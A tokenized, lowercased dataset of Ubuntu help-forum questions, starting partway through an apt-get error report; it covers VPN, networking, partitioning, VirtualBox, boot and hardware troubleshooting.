//in.archive.ubuntu.com raring/restricted translation-en_in ign http : //in.archive.ubuntu.com raring/restricted translation-en ign http : //in.archive.ubuntu.com raring/universe translation-en_in ign http : //in.archive.ubuntu.com raring/universe translation-en ign http : //in.archive.ubuntu.com raring-updates/main translation-en_in ign http : //in.archive.ubuntu.com raring-updates/main translation-en ign http : //in.archive.ubuntu.com raring-updates/multiverse translation-en_in ign http : //in.archive.ubuntu.com raring-updates/multiverse translation-en ign http : //in.archive.ubuntu.com raring-updates/restricted translation-en_in ign http : //in.archive.ubuntu.com raring-updates/restricted translation-en ign http : //in.archive.ubuntu.com raring-updates/universe translation-en_in ign http : //in.archive.ubuntu.com raring-updates/universe translation-en ign http : //in.archive.ubuntu.com raring-backports/main translation-en_in ign http : //in.archive.ubuntu.com raring-backports/main translation-en ign http : //in.archive.ubuntu.com raring-backports/multiverse translation-en_in ign http : //in.archive.ubuntu.com raring-backports/multiverse translation-en ign http : //in.archive.ubuntu.com raring-backports/restricted translation-en_in ign http : //in.archive.ubuntu.com raring-backports/restricted translation-en ign http : //in.archive.ubuntu.com raring-backports/universe translation-en_in ign http : //in.archive.ubuntu.com raring-backports/universe translation-en err http : //in.archive.ubuntu.com raring/main sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring/restricted sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring/universe sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring/multiverse sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring/main i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring/restricted i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring/universe i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring/multiverse i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-updates/main sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-updates/restricted sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-updates/universe sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-updates/multiverse sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-updates/main i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-updates/restricted i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-updates/universe i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-updates/multiverse i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-backports/main sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-backports/restricted sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-backports/universe sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-backports/multiverse sources 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-backports/main i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-backports/restricted i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-backports/universe i386 packages 404 not found [ ip : 91.189.92.200 80 ] err http : //in.archive.ubuntu.com raring-backports/multiverse i386 packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/binary-i386/packages 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/restricted/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/multiverse/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring/restricted/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/universe/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring/universe/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring/multiverse/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/main/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring/main/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring/restricted/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring/universe/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-updates/main/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-updates/restricted/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-updates/universe/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-updates/multiverse/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-updates/main/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-updates/restricted/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-updates/universe/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-updates/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-backports/main/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-backports/restricted/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-backports/universe/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-backports/multiverse/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-backports/main/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-backports/restricted/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-backports/universe/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-backports/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.200 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . sriansh @ sriansh-pc : ~ $ sudo apt-get install ap-hotspot reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : dnsmasq hostapd the following new packages will be installed : ap-hotspot dnsmasq hostapd 0 upgraded , 3 newly installed , 0 to remove and 159 not upgraded . need to get 446 kb/451 kb of archives . after this operation , 1,240 kb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! dnsmasq hostapd install these packages without verification [ y/n ] ? y err http : //in.archive.ubuntu.com/ubuntu/ raring/universe dnsmasq all 2.65-1ubuntu1 404 not found [ ip : 91.189.88.149 80 ] err http : //in.archive.ubuntu.com/ubuntu/ raring/universe hostapd i386 1:1.0-3ubuntu1 404 not found [ ip : 91.189.88.149 80 ] failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/universe/d/dnsmasq/dnsmasq_2.65-1ubuntu1_all.deb 404 not found [ ip : 91.189.88.149 80 ] failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/universe/w/wpa/hostapd_1.0-3ubuntu1_i386.deb 404 not found [ ip : 91.189.88.149 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? so , not able to install ap-hotspot . where i went wrong..please help..
520218	windows 8 enterprise trial install deleted a separate ubuntu 14.04 partition	i had ubuntu 14.04 installed . i wanted to try out windows 8 . so , installed windows 8.1 enterprise evaluation trial using bootable pen drive . after installation , i found out that two of my partitions including one which had ubuntu 14.04 got deleted ( do n't know how that happened ) . the resulting 144.3 gb free space i now have originally had two partitions . first partition of about 40 gb had ubuntu 14.04 installed and the second partition of about 100 gb was an ntfs partition . is there any way to recover these especially the ubuntu partition .
520219	i can not create a new vpn connection 14.04	i have installed ubuntu 14.04 and it seems like i can not actually create a vpn connectionor manage the network devices . when i am accessing the network connection using the network icon at the gnome bar i enter the `` edit connections '' - > add - > pptp - > create - > i can not edit any property of the window . it states `` editing vpn connection 1 '' in the top of the windows\form but i can not edit anything and there for can not create the vpn connection . i have also tried to use the `` system settings '' - > network - > `` + '' button - > interface vpn - > create - > pptp - > create - > and again can not touch any property of the windows . maybe it 's related to permissions but i do n't see any place i can run the `` system settings '' - > network or any other related thing that allows me to elevate my permissions from just `` user mode '' to a `` privileged mode '' while i still can run sudo using my password .
520220	pppd : lcp terminated by peer ( peer refused to authenticate )	i 'm confused , vpn client worked flawlessly on my virtual machine and today when i tried it failed to connect to l2tp vpn server ... this is the log from my client vm , can someone help ? i changed nothing ( on purpose ) and i do not understand why suddenly peer does not want to authenticate and was that expected in the past or its a new thing ? my tablet still manage to connect as before . sep 4 22:29:51 ubuntu64 ipsec_setup : ... openswan ipsec started sep 4 22:29:51 ubuntu64 l2tpipsecvpncontroldaemon : command ipsec setup start finished with exit code 0 sep 4 22:29:51 ubuntu64 l2tpipsecvpncontroldaemon : executing command service xl2tpd start sep 4 22:29:51 ubuntu64 xl2tpd [ 4665 ] : setsockopt recvref [ 30 ] : protocol not available sep 4 22:29:51 ubuntu64 ipsec__plutorun : adjusting ipsec.d to /etc/ipsec.d sep 4 22:29:51 ubuntu64 xl2tpd [ 4665 ] : this binary does not support kernel l2tp . sep 4 22:29:51 ubuntu64 l2tpipsecvpncontroldaemon : command service xl2tpd start finished with exit code 0 sep 4 22:29:51 ubuntu64 pluto : adjusting ipsec.d to /etc/ipsec.d sep 4 22:29:51 ubuntu64 xl2tpd [ 4666 ] : xl2tpd version xl2tpd-1.3.6 started on ubuntu64 pid:4666 sep 4 22:29:51 ubuntu64 xl2tpd [ 4666 ] : written by mark spencer , copyright ( c ) 1998 , adtran , inc. sep 4 22:29:51 ubuntu64 xl2tpd [ 4666 ] : forked by scott balmos and david stipp , ( c ) 2001 sep 4 22:29:51 ubuntu64 xl2tpd [ 4666 ] : inherited by jeff mcadams , ( c ) 2002 sep 4 22:29:51 ubuntu64 xl2tpd [ 4666 ] : forked again by xelerance ( www.xelerance.com ) ( c ) 2006 sep 4 22:29:51 ubuntu64 xl2tpd [ 4666 ] : listening on ip address 0.0.0.0 , port 1701 sep 4 22:29:51 ubuntu64 ipsec__plutorun : 002 added connection description `` cber_l2tp_cable '' sep 4 22:29:51 ubuntu64 l2tpipsecvpncontroldaemon : executing command ipsec auto -- ready sep 4 22:29:52 ubuntu64 ipsec__plutorun : 002 added connection description `` cber_l2tp_adsl '' sep 4 22:29:52 ubuntu64 l2tpipsecvpncontroldaemon : command ipsec auto -- ready finished with exit code 0 sep 4 22:29:52 ubuntu64 l2tpipsecvpncontroldaemon : executing command ipsec auto -- up cber_l2tp_cable sep 4 22:29:52 ubuntu64 l2tpipsecvpncontroldaemon : command ipsec auto -- up cber_l2tp_cable finished with exit code 0 sep 4 22:29:53 ubuntu64 l2tpipsecvpncontroldaemon : closing client connection sep 4 22:29:53 ubuntu64 xl2tpd [ 4666 ] : connecting to host yin-cable.dyndns.biz , port 1701 sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : connection established to 999.999.999.999 , 1701 . local : 19801 , remote : 56042 ( ref=0/0 ) . sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : calling on tunnel 19801 sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : check_control : received out of order control packet on tunnel 56042 ( got 0 , expected 1 ) sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : handle_packet : bad control packet ! sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : check_control : received out of order control packet on tunnel 56042 ( got 0 , expected 1 ) sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : handle_packet : bad control packet ! sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : call established with 999.999.999.999 , local : 5753 , remote : 13038 , serial : 1 ( ref=0/0 ) sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : start_pppd : i 'm running : sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : `` /usr/sbin/pppd '' sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : `` passive '' sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : `` nodetach '' sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : `` : '' sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : `` file '' sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : `` /etc/ppp/cber_l2tp_cable.options.xl2tpd '' sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : `` /dev/pts/4 '' sep 4 22:29:55 ubuntu64 pppd [ 4725 ] : plugin passprompt.so loaded . sep 4 22:29:55 ubuntu64 pppd [ 4725 ] : pppd 2.4.5 started by root , uid 0 sep 4 22:29:55 ubuntu64 pppd [ 4725 ] : using interface ppp0 sep 4 22:29:55 ubuntu64 pppd [ 4725 ] : connect : ppp0 < -- > /dev/pts/4 sep 4 22:29:55 ubuntu64 networkmanager [ 794 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) sep 4 22:29:55 ubuntu64 networkmanager [ 794 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . sep 4 22:29:55 ubuntu64 networkmanager [ 794 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... sep 4 22:29:55 ubuntu64 pppd [ 4725 ] : lcp terminated by peer ( peer refused to authenticate ) sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : control_finish : connection closed to 999.999.999.999 , serial 1 ( ) sep 4 22:29:55 ubuntu64 xl2tpd [ 4666 ] : terminating pppd : sending term signal to pid 4725 sep 4 22:29:55 ubuntu64 pppd [ 4725 ] : terminating on signal 15 sep 4 22:29:55 ubuntu64 pppd [ 4725 ] : modem hangup sep 4 22:29:55 ubuntu64 pppd [ 4725 ] : connection terminated . sep 4 22:29:55 ubuntu64 networkmanager [ 794 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) sep 4 22:29:55 ubuntu64 pppd [ 4725 ] : exit .
520223	what does ps1 command do ?	while reading about linux i got the following ... the ps1 variable is the character string that is displayed as the prompt on the command line . most distributions set ps1 to a known default value , which is suitable in most cases . however , users may want custom information to show on the command line . for example , some system administrators require the user and the host system name to show up on the command line as in : student @ quad32 $ this could prove useful if you are working in multiple roles and want to be always reminded of who you are and what machine you are on . the prompt above could be implemented by setting the ps1 variable to : \u @ \h \ $ and when i tried this on my shell : anupam @ jazz : ~ $ echo $ ps1 anupam @ jazz : ~ $ echo $ ps1 \ [ \e ] 0 ; \u @ \h : \w\a\ ] $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ anupam @ jazz : ~ $ firstly i am not getting this jargon as my second command $ echo $ ps1 is giving as a result , secondly in my first command $ echo $ ps1 it is producing a blank line , ,whereas there is no command like ps1 ( as commands in linux are case sensitive ) , why the first command is giving a blank line.. ? does it matter strictly to follow case sensitive rule , because in some reference they write pylint instead of pylint or pylab instead of pylab which could be misleading ... ?
520229	how to create a very limited user on ubuntu 14.04	i 'm trying to make a safe workstation pc for sensitive data using ubuntu 14.04 . no user should have the right to : print , connect a usb flash drive to transfer files , send files via email or install new softwares . i 'd like the restricted user to only be able to read files and not transfer them in any way possible . thanks for any help .
520231	how to upgrade ubuntu 14.04 to 14.04.1 from iso image	i 'm curious to know how do i can upgrade ubuntu without the internet and upgrade my ubuntu 14.04 lts just using ubuntu 14.04.1 lts iso image ?
520233	jprofiler gui not showing properly on ubuntu 14.04	i 'm not sure if this is a java problem or is related to ubuntu . i 'm on an ubuntu 14.04 machine and i have both java 6 ( jdk_1.6.0_43 ) and java 7 ( jdk_1.7.0_51 ) . java_home is set to java 7 and that is what my path env var is referring to . so java -version would give me the following : java version `` 1.7.0_51 '' java ( tm ) se runtime environment ( build 1.7.0_51-b13 ) java hotspot ( tm ) 64-bit server vm ( build 24.51-b03 , mixed mode ) now i installed jprofiler ( v 8.0.7 ) for linux by downloading the setup script and running it ( https : //www.ej-technologies.com/download/jprofiler/files ) . but when i run jprofiler from command line , i get a non workable gui showing up with all window sizes messed up . i can not resize the windows so i have no access to the functionality . the quickstart window shows up but clicking anywhere on that window makes the whole window disappear . any idea what is going on ?
520234	how can i make the shutdown button shutdown , instead of logout , in xubuntu ?	in xubuntu 14.04 , using the xubuntu-desktop , if i push the physical power button on my computer , a panel pops up asking if i would like to log out , restart , or shut down . if i select `` shut down '' , i am logged out . expected behavior : computer shuts down . how can i configure it to do the correct thing ? this is a vanilla , totally out of the box setup .
520236	installing ubuntu 14.04 w/ win 7 - delete recovery/hibernation partitions ?	i 've installed dual-boot setups of ubuntu before and have never run into any major problems ( with the installation ) until now . it started when i tried to run the `` install ubuntu '' option from the live usb i created . it did n't recognize the win 7 os already installed ( i just did a clean install yesterday ) so it did n't give me the option to `` install alongside '' . i did some searching on this site and the ubuntu forums and just google in general , but most of it applied to uefi systems ( which i do not have ) . the best option seems to be to shrink the main c : drive ( /dev/sda5 in the screenshot below ) , then install ubuntu on the newly freed up space . my question , though , is can i get rid of the recovery ( sda1 ) , system reserved ( sda2 ) and hibernation ( sda6 ) partitions as well ? this is a desktop so i do n't need hibernation and i have recovery disks that work fine . but will the deletion of these prevent me from using my win 7 partition ? screenshot : gparted screenshot screenshot : fdisk output other questions related to mine : is it necessary to delete the recovery partition ? ( really ? i ca n't delete it ? other answers seem to disagree ) deleting recovery partition on dual boot machine and resizing window 7 partition ( i only have oem supplied recovery disks , without the extra options that the microsoft-supplied ones have ) what is the best way to set all this up ? if i shrink then install will grub be able to find my win 7 installation ?
520239	using upstart for non-daemon tasks	i would like to have foo do-startup-things run on boot , and foo do-shutdown-things run on shutdown where foo is my own program . it looks like upstart is a good candidate to do this , but upstart seems to be designed for use with daemons , so running service foo stop gives the error stop : unknown instance : because the process executed when the startup job was run is no longer running . is there a way to use upstart to execute tasks on startup and shutdown without starting a daemon ?
520240	problem deploying node	deployment of node is failing with error message util.py [ warning ] : failed accessing user data . after pxe boot ( nothing happens after this message ) . see below screenshot : can you please suggest what i am doing wrong ? i am using the latest lts build root @ maas : ~ # cat /etc/debian_version jessie/sid root @ maas : ~ # uname -a linux maas 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux
520242	what is the best option for using ubuntu 14.4 with an asus k55n with dual monitors ?	i just upgraded to 14.4 on my asus k55n . i freaked out a little at first because as soon as it loaded up from the restart the screen was just a bunch of little white squares . i realized eventually i still had my monitor plugged in via hdmi . i unplugged it , hard restarted it , and viola it booted up great . now i had to try again . when i try and plug in my external monitor the screen freaks out the top bar jumps to the middle of the screen and everything becomes unresponsive other than the cursor . i looked and sure enough i am back to proprietary drivers . the move i am thinking is to install amd catalyst again ? thoughts ? also , when i go to additional drivers it doesnt even show catalyst as an option .
520243	md5 hashes are different with iso-images of 14.04 amd64 server and desktop	what shall i care for ? are sums given at https : //help.ubuntu.com/community/ubuntuhashes wrong ? or do used progs calculate wrong ? description/source md5-hash winmd5sum : ubuntu-14.04.1-server-amd64.iso ca2531b8cd79ea5b778ede3a524779b9 winmd5sum : ubuntu-14.04.1-desktop-amd64.iso 119cb63b48c9a18f31f417f09655efbd ubuntusite hash : ubuntu-14.04-server-amd64.iso 01545fa976c8367b4f0d59169ac4866c ubuntusite hash : ubuntu-14.04-desktop-amd64.iso dccff28314d9ae4ed262cfc6f35e5153 fileverifier++ : ubuntu-14.04.1-server-amd64.iso ca2531b8cd79ea5b778ede3a524779b9 fileverifier++ : ubuntu-14.04.1-desktop-amd64.iso 119cb63b48c9a18f31f417f09655efbd as you may see , winmd5sum and fileverifier++ calculate the same value , but different from values shown at above mentioned site .
520244	14.04 login problem	i installed a 14.4 along side of windows 7 ultimate . it boots ok , but right after submitting my password , it goes to a blank multicolored screen . i have to manually turn off pc . i have a dell 531 inspirion . i can log in safe mode ok .
520245	google chrome opens `` chrome-google chrome ''	i recently installed ubuntu 14.04 . i also installed google chrome . however , whenever i try to launch chrome from the dock , the `` google chrome '' icon flashes , then opens a new icon called `` chrome-google chrome '' with the actual application running . i 'm trying to get chrome to just open from the dedicated `` google chrome '' icon . also , when doing a system wide search , two google chrome 's pop up . i 've asked this question before , but i ca n't find it at all here . i recall the solution having something to do with finding the config files for chrome , copying and pasting them into a texteditor , changing some values , then copy pasting back into the original config files . thank you ! edit : i managed to find my first post about this issue . if anyone is curious or has the same issue , the solution that worked for me is here : ubuntu 13.10 ( google account - google chrome ) icon issue
520248	how do i load a custom phone template into syncevolution gui ? ( sync-ui )	i 'm trying to sync my old sony ericson w810i with my evolution suite for contacts , calendar , events , appointments and notes . i 've checked with sdptool search -- bdaddr ( xx : xx : xx ) syncml and gotten positive results . i also downloaded a template file from the official wiki for my phone model ... but theres no direction on what to do with it . i 've tried reading through the command line documentation and the help included but can not manage to load the template i was given . all of the options for the preloaded profiles fail mid-sync , so they 're not an option . custom was the only way to go , but at least i have a reliable one that 's been tested by someone who knows how to do it . at the moment the file is placed in : ~/.config/syncevolution-templates as w810i .
520251	how to get internet connection working ( restarting networking and network-manager does nothing ) ?	my internet connection is not working since i restarted my laptop ( which is very old ) . here 's what i 've tried : ran sudo -s then tried /etc/init.d/networking stop : * deconfiguring network interfaces ... root @ carlos-laptop : ~ # ran status networking : networking stop/waiting ran status network-manager : network-manager start/running , process 621 running restart networking gives me : restart : unknown instance : i successfully restarted network-manager . ran /etc/init.d/networking start . it says i should instead use the service ( 8 ) utility and `` since the script you are attempting to invoke has been converted to an upstart job , you may also use the service ( 8 ) ... ... networking stop/waiting '' . tried ifup eth0 and got ignoring unknown interface eth0=eth0 ifdown eth0 gave : interface eth0 not configured then i configured /etc/network/interfaces in nano . specifically , i deleted loopback lo and inserted eth0 . then i ran /etc/init.d/networking restart . ( by this point i thought it would work , but i was wrong . ) i got : *reconfiguring network interfaces ... internet systems consortium dhcp client v3.1.3 copyright ... bla all rights reserved listening on lpf/eth0/00:90 : f5:4d : f8 : ed sending on -- as above -- sending on socket/fallback dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 4 ; 6 ; 7 ; 14 ; 19 ; 11 no dhcpoffers recevied . no working leases in persistent database - sleeping . i tried to ping www.google.com and got ping : unknown host www.google.com . ran dpkg -- configure -a which gave : setting up libsdl-ttf2.0-0 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : libsdl-ttf2.0-0 tried restart networking again : there is already a pid file /var/run/dgclient.eth0.pid with pid 1811 killed old client process , removed pid file internet systems ... got the same answer- no dhcpoffers received . started firefox , went to google : -xml parsing error : not well-formed location : jar : file///usr/lib/firefox/omni.ja ! /chrome/toolkit/content/global/eterror.xhtml line number 23 , column 51 : < link rel= '' stylesheet '' href= '' chrome : //global/s tried to restart the laptop , and got nothing again . ran route -n : destination 169.254.0.0 gateway 0.0.0.0 genmask 255.255.0.0 flags metric ref u 0 0 use iface 0 eth0 did sudo dhclient eth0 , got : no dhcpoffers received restarted again , opened /etc/network/interfaces . it was empty . networkingmanager.conf is also empty . i do n't know what to do . i am so frustrated right now and have been writing this for an hour on my friend 's iphone . so if you can , help me , thank you .
520252	ca n't select ubuntu drive in boot order if multiple drives are present	after disconnecting drive c : which contains windows , i re-started my pc and booted to the ubuntu cd and installed ubuntu 14.04.1 lts on a spare hard drive . i can boot to ubuntu if i disconnect the other hard disks in the pc and re-start . i was planning on accessing ubuntu occasionally , by entering the bios and altering the boot order of the hard drives . all hard drives are detected in one screen of the bios however in the screen where boot order can be selected , the bios does not recognize the disk containing ubuntu . i expected to be able to set the boot order to 1 . cd-rom 2. hard drive with windows 3. hard drive with ubuntu the bios fails to list the ubuntu drive among the available boot drives in the boot order screen when the windows drive is connected . somewhat related , dual boot on one drive is potentially destructive , costly , and highly inconvenient . one of my pc 's allowed ubuntu and windows to exist flawlessly on the same hard drive . so i thought i 'd do the same on my main pc . i ended up with trashed partitions , had to go out and buy a new hard drive , and re-install a windows image backup . thus my pursuit of putting ubuntu on a separate drive , i do n't care if i have to fiddle with bios or sata cables to occasionally use ubuntu .
520253	lenovo g510 bluetooth and usb does n't work properly	i installed ubuntu 14.0.1 on my laptop lenovo g510 . processor 4x intel ( r ) core ( tm ) i5-4200m cpu @ 2.50ghz memory 8091mb ( 797mb used ) operating system ubuntu 14.04.1 lts kernel linux 3.13.0-35-generic ( x86_64 ) compiled # 62-ubuntu smp fri aug 15 01:58:42 utc 2014 c library unknown default c compiler gnu c compiler version 4.8.2 ( ubuntu 4.8.2-19ubuntu1 ) distribution ubuntu 14.04.1 lts when i start the system sometimes usb ports works and sometimes does n't work and also bluetooth sometimes works and sometimes does n't work after start or restart system . somebody can helpme to solve this problem please ? thank 's a lot . maurizio
520255	arduino `` com1 - not found '' and serial port greyed out	i recently switched to linux mint 17 but this should not be a huge problem as it is based on ubuntu ( i 'm gon na ask a more 'core ' problem , so it should n't really matter , but if someone decide the answer is not appropriate to be here , please , let it be removed ) . so , i installed arduino ide and tried to upload a simple blink example . but it returned an error , that arduino is not accessible on com1 port . i 've read a lot on the subject , added my user to both dialup and uucp ( somewhere , people said to add my user to the lock group , but there is no such thing on my system ) , enabled the ftdi_sio module with modprobe , and basically , tried all popular methods to `` unlock '' the `` serial port '' menu . so , my question is : what should i do to make the `` serial port '' option available ? feel free to ask me for different outputs and to make me install new packages .
520256	about keyboards and extremely advanced shortcut scripting	is it possible to set qwerty keys as shortcuts ? `` thats positively mad , why would he want to do such a thing ! '' well bob , im so glad that youre just the voice in my head ... so , if i were to press and hold in sequence c + h + r , it would run chromium-browser or s + t + r , and then run ... winedebug=-all wine /home/me/desktop/star*cr*/support/sc2switcher & echo `` you should run this in opengl , it would run smoother . oh right you cant . but mac can - why ? '' or is this something that i can already do , but i havent found the button yet ? thanks for your time ...
520257	hyper-v : ubuntu 14.04 server w/ 2 network interfaces	on my win2012 server w/ hyper-v role i have configured 2 virtual switches : external vswitch and internal vswitch . the ubuntu vm is connected to both vswitches via 2 network intertfaces eth0 and eth1 . eth0 is connected to the external hyper-v vswitch , then via physical nic goes out to the switch- > router- > internet . eth1 is connected to internal vswitch and has connectivity only to the host win2012 server as expected . this ubuntu vm has mounted a few samba shares running on the host win2012 server . question : anyway that eth1 ( internal vswitch ) can be prioritized so that the traffic from/to smb shares goes thru eth1 rather than eth0 ? ? i would like to minimize the traffic via physical switch . when i stream from the smb shares , i can see all traffic goes via eth0 ( external vswitch ) even though eth1 has a valid ip address and pings the host server .
520259	so , i tried creating an os with virtualbox , and i got this error:	kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . i tried checking other posts and found : ( vitualbox ) using vboxdrv setup failed i did this : : ~ $ sudo apt-get -- reinstall install virtualbox-dkms after that i got this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : virtualbox-dkms : depends : virtualbox ( > = 4.3.10-dfsg-1 ) e : unable to correct problems , you have held broken packages . kindly help . -- ed
520260	dvd without sound or with noise	i have a problem with devede . whenever i try to create a dvd with a mkv file , or avi , or m4v the result is a dvd without sound or with noise . i 'm running ubuntu 14.04 and devede 3.23.0 beta1 is there any help out there ? thank you
520261	wireless not working after ubuntu 14.04 install ?	i installed ubuntu 14.04 on hp dv6000 . the networks are detected but do not connect . here 's the output requested on similar questions http : //pastebin.ubuntu.com/8254387/ any help greatly appreciated .
